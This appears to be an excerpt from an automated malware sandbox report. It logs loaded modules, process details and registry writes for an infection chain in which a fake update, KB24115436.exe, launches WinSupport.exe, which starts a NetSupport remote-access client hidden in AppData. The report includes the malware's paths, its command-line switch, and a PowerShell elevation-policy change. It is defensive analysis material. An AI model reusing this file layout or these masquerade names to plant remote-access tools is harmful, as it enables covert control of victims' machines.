c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sfc_os.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\ole32.dll
c:\windows\system32\riched20.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\shell32.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\oleaut32.dll
c:\program files\common files\microsoft shared\ink\tiptsf.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\profapi.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\shdocvw.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\users\admin\appdata\roaming\codeintegrity\winsupport.exe
c:\windows\system32\sfc.dll
c:\windows\system32\devrtl.dll
c:\windows\system32\mpr.dll

PID
4028
CMD
"C:\Users\admin\AppData\Roaming\CodeIntegrity\WinSupport.exe" -pjf74idD
Path
C:\Users\admin\AppData\Roaming\CodeIntegrity\WinSupport.exe
Indicators
Parent process
KB24115436.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Description
Version
Modules
Image
c:\users\admin\appdata\roaming\codeintegrity\winsupport.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sfc_os.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\ole32.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\riched20.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\shell32.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\oleaut32.dll
c:\program files\common files\microsoft shared\ink\tiptsf.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\devobj.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\profapi.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\shdocvw.dll
c:\windows\system32\linkinfo.dll
c:\windows\system32\ntshrui.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\cscapi.dll
c:\windows\system32\slc.dll
c:\users\admin\appdata\roaming\codeintegrity\winsupport\client32.exe
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\sfc.dll
c:\windows\system32\devrtl.dll
c:\windows\system32\mpr.dll
c:\windows\system32\netutils.dll

PID
2268
CMD
"C:\Users\admin\AppData\Roaming\CodeIntegrity\WinSupport\client32.exe"
Path
C:\Users\admin\AppData\Roaming\CodeIntegrity\WinSupport\client32.exe
Indicators
Parent process
WinSupport.exe
User
admin
Integrity Level
MEDIUM
Exit code
9
Version:
Company
NetSupport Ltd
Description
NetSupport Client Application
Version
V12.10
Modules
Image
c:\users\admin\appdata\roaming\codeintegrity\winsupport\client32.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\users\admin\appdata\roaming\codeintegrity\winsupport\pcicl32.dll
c:\users\admin\appdata\roaming\codeintegrity\winsupport\shfolder.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\users\admin\appdata\roaming\codeintegrity\winsupport\pcichek.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\usp10.dll
c:\windows\system32\lpk.dll
c:\users\admin\appdata\roaming\codeintegrity\winsupport\msvcr100.dll
c:\users\admin\appdata\roaming\codeintegrity\winsupport\pcicapi.dll
c:\windows\system32\mpr.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll
c:\windows\system32\version.dll
c:\windows\system32\winmm.dll
c:\windows\system32\wsock32.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\winspool.drv
c:\windows\system32\comdlg32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\shell32.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\netapi32.dll
c:\windows\system32\netutils.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\wkscli.dll
c:\windows\system32\samcli.dll
c:\windows\system32\wininet.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\wtsapi32.dll
c:\users\admin\appdata\roaming\codeintegrity\winsupport\cryptpak.dll
c:\users\admin\appdata\roaming\codeintegrity\winsupport\tcctl32.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\dbghelp.dll
c:\windows\system32\dhcpcsvc6.dll
c:\windows\system32\dhcpcsvc.dll
c:\users\admin\appdata\roaming\codeintegrity\winsupport\htctl32.dll
c:\windows\system32\psapi.dll
c:\users\admin\appdata\roaming\codeintegrity\winsupport\pcihooks.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\winsta.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\wbem\wbemprox.dll
c:\windows\system32\wbemcomn.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\wbem\wbemsvc.dll
c:\windows\system32\wbem\fastprox.dll
c:\windows\system32\ntdsapi.dll
c:\windows\system32\riched32.dll
c:\windows\system32\riched20.dll
c:\users\admin\appdata\roaming\codeintegrity\winsupport\pciinv.dll
c:\windows\system32\msimg32.dll
c:\windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll
c:\windows\system32\oleacc.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\dwmapi.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\firewallapi.dll
c:\windows\system32\nlaapi.dll
c:\windows\system32\napinsp.dll
c:\windows\system32\pnrpnsp.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\winrnr.dll
c:\windows\system32\rasapi32.dll
c:\windows\system32\rasman.dll
c:\windows\system32\rtutils.dll
c:\windows\system32\sensapi.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\wship6.dll
c:\windows\system32\fwpuclnt.dll
c:\windows\system32\msi.dll
c:\program files\adobe\acrobat reader dc\reader\acrord32.exe
c:\program files\ccleaner\ccleaner.exe
c:\program files\google\chrome\application\chrome.exe
c:\program files\dvd maker\dvdmaker.exe
c:\windows\system32\propsys.dll
c:\windows\system32\linkinfo.dll
c:\program files\microsoft office\office14\excel.exe
c:\program files\filezilla ftp client\filezilla.exe
c:\program files\mozilla firefox\firefox.exe
c:\program files\internet explorer\iexplore.exe
c:\program files\java\jre1.8.0_92\bin\javaws.exe
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\program files\windows journal\journal.exe
c:\program files\common files\microsoft shared\ink\mip.exe
c:\program files\windows media player\wmplayer.exe
c:\program files\microsoft office\office14\msaccess.exe
c:\program files\common files\microsoft shared\office14\msoxmled.exe
c:\program files\opera\opera.exe
c:\program files\microsoft office\office14\mspub.exe
c:\program files\microsoft office\office14\outlook.exe
c:\program files\notepad++\notepad++.exe
c:\program files\microsoft office\office14\ois.exe
c:\windows\system32\ie4uinit.exe
c:\program files\microsoft office\office14\onenote.exe
c:\program files\microsoft\skype for desktop\skype.exe
c:\program files\microsoft office\office14\powerpnt.exe
c:\program files\videolan\vlc\vlc.exe
c:\program files\windows sidebar\sidebar.exe
c:\program files\common files\microsoft shared\ink\tabtip.exe
c:\program files\windows mail\wab.exe
c:\program files\windows mail\wabmig.exe
c:\program files\winrar\winrar.exe
c:\program files\microsoft office\office14\winword.exe
c:\windows\system32\apphelp.dll
c:\windows\system32\shdocvw.dll
c:\program files\common files\microsoft shared\ink\shapecollector.exe
c:\program files\filezilla ftp client\uninstall.exe
c:\windows\system32\gameux.dll
c:\windows\system32\xmllite.dll
c:\windows\system32\wer.dll
c:\program files\java\jre1.8.0_92\bin\javacpl.exe
c:\program files\common files\microsoft shared\office14\office setup controller\promo.exe
c:\windows\system32\tapi32.dll
c:\windows\system32\cscapi.dll
c:\windows\system32\dxdiagn.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\dxgi.dll
c:\windows\system32\d3d10.dll
c:\windows\system32\d3d10core.dll
c:\windows\system32\d3d10_1.dll
c:\windows\system32\d3d10_1core.dll
c:\windows\system32\d3d11.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\ddraw.dll
c:\windows\system32\dsound.dll

Registry activity

Total events
3916
Read events
3681
Write events
232
Delete events
3

Modification events

PID
Process
Operation
Key
Name
Value
3076
iexplore.exe
delete key
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012019032320190324
3076
iexplore.exe
delete key
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13
3076
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
CompatibilityFlags
0
3076
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
0
3076
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
1
3076
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones
SecuritySafe
1
3076
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
ProxyEnable
0
3076
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
4600000077000000010000000000000000000000000000000000000000000000C0E333BBEAB1D301000000000000000000000000020000001700000000000000FE800000000000007D6CB050D9C573F70B000000000000006D00330032005C004D00530049004D004700330032002E0064006C000100000004AA400014AA4000040000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000C0A8016400000000000000000000000000000000000000000800000000000000805D3F00983740000008000002000000000000600000002060040000B8A94000020000008802000060040000B8A9400004000000F8010000B284000088B64000B84B400043003A000000000000000000000000000000000000000000
3076
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Recovery\Active
{163C6779-A3E6-11E9-B506-5254004A04AF}
0
3076
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{2670000A-7350-4F3C-8081-5663EE0C6C49}\iexplore
Type
4
3076
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{2670000A-7350-4F3C-8081-5663EE0C6C49}\iexplore
Count
1
3076
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{2670000A-7350-4F3C-8081-5663EE0C6C49}\iexplore
Time
E307070004000B000E000D002B001602
3076
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{789FE86F-6FC4-46A1-9849-EDE0DB0C95CA}\iexplore
Type
4
3076
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{789FE86F-6FC4-46A1-9849-EDE0DB0C95CA}\iexplore
Count
1
3076
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{789FE86F-6FC4-46A1-9849-EDE0DB0C95CA}\iexplore
Time
E307070004000B000E000D002B002502
3076
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
FullScreen
no
3076
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
Window_Placement
2C0000000200000003000000FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF20000000200000004003000078020000
3076
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MenuOrder\Favorites\Links
Order
3076
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{761497BB-D6F0-462C-B6EB-D4DAF1D92D43}\iexplore
Type
3
3076
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{761497BB-D6F0-462C-B6EB-D4DAF1D92D43}\iexplore
Count
1
3076
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{761497BB-D6F0-462C-B6EB-D4DAF1D92D43}\iexplore
Time
E307070004000B000E000D002B00F102
3076
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{761497BB-D6F0-462C-B6EB-D4DAF1D92D43}\iexplore
LoadTime
24
3076
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{B4F3A835-0E21-4959-BA22-42B3008E02FF}\iexplore
Type
3
3076
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{B4F3A835-0E21-4959-BA22-42B3008E02FF}\iexplore
Count
1
3076
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{B4F3A835-0E21-4959-BA22-42B3008E02FF}\iexplore
Time
E307070004000B000E000D002B002F03
3076
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{B4F3A835-0E21-4959-BA22-42B3008E02FF}\iexplore
LoadTime
400
3076
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{DBC80044-A445-435B-BC74-9C25C1C588A9}\iexplore
Type
3
3076
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{DBC80044-A445-435B-BC74-9C25C1C588A9}\iexplore
Count
1
3076
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{DBC80044-A445-435B-BC74-9C25C1C588A9}\iexplore
Time
E307070004000B000E000D002C00AE00
3076
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{DBC80044-A445-435B-BC74-9C25C1C588A9}\iexplore
LoadTime
57
3076
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012019071120190712
CachePath
%USERPROFILE%\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012019071120190712
3076
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012019071120190712
CachePrefix
:2019071120190712:
3076
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012019071120190712
CacheLimit
8192
3076
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012019071120190712
CacheOptions
11
3076
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012019071120190712
CacheRepair
0
3076
iexplore.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\70\52C64B7E
LanguageList
en-US
3076
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\WindowsSearch
UpgradeTime
9C08C1D9F237D501
3076
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\WindowsSearch
UpgradeTime
F66AC3D9F237D501
3076
iexplore.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13
Blob
3076
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{9F6EE0FA-4991-4DD7-87B9-9DA4AD1C1781}
AppPath
C:\Windows\System32\WindowsPowerShell\v1.0
3076
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{9F6EE0FA-4991-4DD7-87B9-9DA4AD1C1781}
AppName
powershell.exe
3076
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{9F6EE0FA-4991-4DD7-87B9-9DA4AD1C1781}
Policy
3
3076
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LinksBar\ItemCache\0
Path
C:\Users\admin\Favorites\Links\Suggested Sites.url
3076
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LinksBar\ItemCache\0
Handler
{B0FA7D7C-7195-4F03-B03E-9DC1C9EBC394}
3076
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LinksBar\ItemCache\0
FeedUrl
https://ieonline.microsoft.com/#ieslice
3076
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LinksBar\ItemCache\0
DisplayName
3076
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LinksBar\ItemCache\0
ErrorState
0
3076
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LinksBar\ItemCache\0
DisplayMask
0
3076
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LinksBar\ItemCache\1
Path
C:\Users\admin\Favorites\Links\Web Slice Gallery.url
3076
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LinksBar\ItemCache\1
Handler
{B0FA7D7C-7195-4F03-B03E-9DC1C9EBC394}
3076
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LinksBar\ItemCache\1
FeedUrl
http://go.microsoft.com/fwlink/?LinkId=121315
3076
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LinksBar\ItemCache\1
DisplayName
3076
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LinksBar\ItemCache\1
ErrorState
0
3076
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LinksBar\ItemCache\1
DisplayMask
0
3556
iexplore.exe
delete key
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\LowCache\Extensible Cache\MSHist012018082820180829
3556
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\LowCache\Extensible Cache\MSHist012019071120190712
CachePath
%USERPROFILE%\AppData\Local\Microsoft\Windows\History\Low\History.IE5\MSHist012019071120190712
3556
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\LowCache\Extensible Cache\MSHist012019071120190712
CachePrefix
:2019071120190712:
3556
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\LowCache\Extensible Cache\MSHist012019071120190712
CacheLimit
8192
3556
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\LowCache\Extensible Cache\MSHist012019071120190712
CacheOptions
11
3556
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\LowCache\Extensible Cache\MSHist012019071120190712
CacheRepair
0
3872
powershell.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\70\52C64B7E
LanguageList
en-US
3872
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
0
3872
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
0
3872
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
4294901760
3872
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
4294901760
3872
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
1048576
3872
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
%windir%\tracing
3872
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
0
3872
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
0
3872
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
4294901760
3872
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
4294901760
3872
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
1048576
3872
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
%windir%\tracing
3872
powershell.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
0
3872
powershell.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
1
2432
WScript.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\70\52C64B7E
LanguageList
en-US
2432
WScript.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\WScript_RASAPI32
EnableFileTracing
0
2432
WScript.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\WScript_RASAPI32
EnableConsoleTracing
0
2432
WScript.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\WScript_RASAPI32
FileTracingMask
4294901760
2432
WScript.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\WScript_RASAPI32
ConsoleTracingMask
4294901760
2432
WScript.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\WScript_RASAPI32
MaxFileSize
1048576
2432
WScript.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\WScript_RASAPI32
FileDirectory
%windir%\tracing
2432
WScript.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\WScript_RASMANCS
EnableFileTracing
0
2432
WScript.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\WScript_RASMANCS
EnableConsoleTracing
0
2432
WScript.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\WScript_RASMANCS
FileTracingMask
4294901760
2432
WScript.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\WScript_RASMANCS
ConsoleTracingMask
4294901760
2432
WScript.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\WScript_RASMANCS
MaxFileSize
1048576
2432
WScript.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\WScript_RASMANCS
FileDirectory
%windir%\tracing
2432
WScript.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
ProxyEnable
0
2432
WScript.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
2432
WScript.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
0
2432
WScript.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
1
3620
WScript.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
ProxyEnable
0
3620
WScript.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
3620
WScript.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
0
3620
WScript.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
1
3896
temp69.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\70\52C64B7E
LanguageList
en-US
3692
KB24115436.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
0
3692
KB24115436.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
1
4028
WinSupport.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
0
4028
WinSupport.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
1
2268
client32.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\client32_RASAPI32
EnableFileTracing
0
2268
client32.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\client32_RASAPI32
EnableConsoleTracing
0
2268
client32.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\client32_RASAPI32
FileTracingMask
4294901760
2268
client32.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\client32_RASAPI32
ConsoleTracingMask
4294901760
2268
client32.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\client32_RASAPI32
MaxFileSize
1048576
2268
client32.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\client32_RASAPI32
FileDirectory
%windir%\tracing
2268
client32.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\client32_RASMANCS
EnableFileTracing
0
2268
client32.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\client32_RASMANCS
EnableConsoleTracing
0
2268
client32.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\client32_RASMANCS
FileTracingMask
4294901760
2268
client32.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\client32_RASMANCS
ConsoleTracingMask
4294901760
2268
client32.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\client32_RASMANCS
MaxFileSize
1048576
2268
client32.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\client32_RASMANCS
FileDirectory
%windir%\tracing
2268
client32.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
ProxyEnable
0
2268
client32.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
2268
client32.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
0
2268
